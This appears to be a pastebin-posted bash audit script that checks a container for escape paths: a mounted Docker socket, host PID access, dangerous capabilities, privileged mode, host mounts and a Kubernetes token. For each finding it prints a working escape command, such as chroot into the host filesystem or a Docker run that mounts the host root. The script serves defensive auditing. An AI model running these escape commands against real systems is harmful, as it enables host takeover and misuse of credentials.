orenma

container_escape_shell

Jul 19th, 2025
  1. #!/bin/bash
  2.  
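  # Banner printed at the start of the audit run.
  echo "==== Container Escape Safety Check (Lab Only) ===="
  # The previous version ran `apk add jq` here. Nothing in this script calls
  # jq, and installing a package modifies the container under assessment
  # (it also needs root and network access, and fails on non-Alpine images),
  # so the audit no longer installs anything.
  # NOTE(review): check_cap_sys_admin calls capsh, which this script never
  # installed; provide it in the image if that check is wanted.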
  5.  
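  #######################################
  # Print an audit finding together with the lab-only command text that
  # illustrates it. The command is only displayed, never executed.
  # Arguments: $1 - short description of the finding
  #            $2 - command text to display
  # Outputs:   a blank line followed by three lines on stdout
  #######################################
  function suggest_exploit() {
    local reason=$1
    local command=$2

    # printf with a fixed format prints both arguments verbatim. `echo -e`
    # expanded backslash sequences (\t, \n, \c, ...) found inside them, which
    # silently altered any displayed text that contained a backslash.
    printf '\n[⚠️  Escape Path Detected: %s]\n' "$reason"
    printf '%s\n' "[💡 Suggested Command for Lab Use Only]"
    printf '    %s\n' "$command"
  }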
  14.  
  #######################################
  # Report whether a filesystem path exists.
  # Arguments: $1 - path to test
  #            $2 - why the path matters when it is present
  # Outputs:   one status line on stdout
  # Returns:   0 when the path exists, 1 otherwise
  # NOTE(review): "Safe" here only means this single path is absent; it is
  # not a statement about the container as a whole.
  #######################################
  function check_path() {
    local path=$1
    local explanation=$2

    # Guard clause: handle the absent case first.
    if [ ! -e "$path" ]; then
      echo "[+] Not found: $path - Safe"
      return 1
    fi

    echo "[!] Found: $path - $explanation"
    return 0
  }
  26.  
  #######################################
  # Report whether a Unix socket exists at /var/run/docker.sock.
  # Only that one path is tested. A workload that can reach the daemon socket
  # can ask the daemon to act on its behalf, so the usual mitigation is not to
  # mount the socket into containers at all.
  # Outputs: status lines on stdout
  #######################################
  function check_docker_socket() {
    local sock=/var/run/docker.sock

    echo "[*] Checking Docker socket..."

    # -S is true only for an existing socket file.
    if [ ! -S "$sock" ]; then
      echo "[+] Docker socket not found - Safe"
      return
    fi

    echo "[!] Docker socket is mounted inside the container"
    suggest_exploit "Docker socket exposure" \
      "docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh"
  }
  37.  
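  #######################################
  # Report whether /proc/1/root resolves to a root directory other than the
  # one this process already has.
  # /proc/1/root exists for PID 1 of every PID namespace, so testing for its
  # existence alone flagged ordinary, correctly isolated containers.
  # NOTE(review): a differing root presumably means the container shares the
  # host PID namespace - confirm against the runtime configuration; the
  # mitigation is not to share that namespace with untrusted workloads.
  # Outputs: status lines on stdout
  #######################################
  function check_host_proc_access() {
    local link=/proc/1/root

    # -ef is true when both names resolve to the same device and inode, i.e.
    # PID 1 uses the very root directory we are already in.
    if [ "$link/" -ef / ]; then
      echo "[+] $link is this container's own root - no host access through it"
      return 0
    fi

    if check_path "$link" "Can allow access to host filesystem if not namespaced"; then
      suggest_exploit "/proc/1/root exposed" \
        "chroot /proc/1/root /bin/sh"
    fi
  }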
  44.  
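  #######################################
  # Report whether capsh lists CAP_SYS_ADMIN or CAP_SYS_PTRACE.
  # Outputs: status lines on stdout
  # NOTE(review): the grep runs over the whole `capsh --print` output, so a
  # capability that appears only in the bounding set is reported as well.
  # Dropping both capabilities from the workload removes the finding.
  #######################################
  function check_cap_sys_admin() {
    echo "[*] Checking capabilities..."

    # Without capsh the pipeline below fails and used to fall through to the
    # "Safe" branch, turning "could not check" into a clean result.
    if ! command -v capsh >/dev/null 2>&1; then
      echo "[?] capsh not available - capability check skipped"
      return 0
    fi

    if capsh --print | grep -qE "cap_sys_admin|cap_sys_ptrace"; then
      echo "[!] Container has SYS_ADMIN or PTRACE - Dangerous capabilities available"
      suggest_exploit "SYS_ADMIN + mounted host path" \
        "mount -t proc proc /host/proc && chroot /host sh"
    else
      echo "[+] SYS_ADMIN and PTRACE not found - Safe"
    fi
  }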
  55.  
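  #######################################
  # Report whether the effective capability mask looks like that of a
  # privileged container (all of the low 32 capability bits set).
  # Arguments: $1 - status file to read (optional, default /proc/self/status)
  # Outputs:   status lines on stdout
  #######################################
  function check_privileged_mode() {
    local status_file=${1:-/proc/self/status}

    echo "[*] Checking for privileged mode..."

    # An unreadable file must not be reported as a clean result.
    if [ ! -r "$status_file" ]; then
      echo "[?] Cannot read $status_file - privileged mode check skipped"
      return 0
    fi

    # The kernel writes the field as "CapEff:<TAB><16 hex digits>". The old
    # pattern 'CapEff: ffffffff' expected a single space directly followed by
    # the f's, so it never matched and every container was reported as not
    # privileged. Match the separator as whitespace and anchor on the low
    # 32 bits instead.
    if grep -qE '^CapEff:[[:space:]]+[0-9a-fA-F]*ffffffff$' "$status_file"; then
      echo "[!] Container likely running in privileged mode"
      suggest_exploit "Privileged container" \
        "mkdir /tmp/host; mount /dev/sda1 /tmp/host && chroot /tmp/host"
    else
      echo "[+] Container is not in full privileged mode"
    fi
  }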
  66.  
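  #######################################
  # Report whether something is mounted at /host or below it.
  # Outputs: one status line on stdout, plus the finding text on a match
  #######################################
  function check_host_mount() {
    # Match the mount point field itself. A bare '/host' substring also
    # matched /etc/hosts and /etc/hostname, which container runtimes commonly
    # bind-mount, so the old check fired in ordinary containers.
    if mount | grep -qE ' on /host(/[^ ]*)? type '; then
      echo "[!] Host filesystem appears mounted under /host"
      suggest_exploit "Host mount detected" \
        "chroot /host /bin/bash"
    else
      # Report the negative result too, as the other checks do.
      echo "[+] No mount at or below /host"
    fi
  }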
  74.  
  #######################################
  # Report whether a Kubernetes service account token file is present at the
  # standard in-pod path.
  # The file's presence is not an escape by itself; what it allows depends on
  # the RBAC permissions bound to the service account. Pods that never call
  # the API can set automountServiceAccountToken: false.
  # Outputs: status lines on stdout
  #######################################
  function check_k8s_token() {
    local token_file=/var/run/secrets/kubernetes.io/serviceaccount/token

    # Guard clause: nothing to report when no regular file is there.
    if [ ! -f "$token_file" ]; then
      echo "[+] No K8s service account token found"
      return
    fi

    echo "[!] Kubernetes service token found"
    suggest_exploit "K8s API abuse via service token" \
      "curl -s --header \"Authorization: Bearer \$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" https://kubernetes.default"
  }
  84.  
  # Run every check in a fixed order, framed by blank lines and a closing
  # banner. The /dev/mem probe goes through check_path directly because it
  # has no dedicated wrapper function.
  echo
  check_path "/dev/mem" "Can lead to host memory read/write if privileged"

  for probe in \
    check_host_proc_access \
    check_host_mount \
    check_cap_sys_admin \
    check_privileged_mode \
    check_docker_socket \
    check_k8s_token; do
    "$probe"
  done

  echo
  echo "==== Check Complete. Use responsibly in lab environments only. ===="
  96.  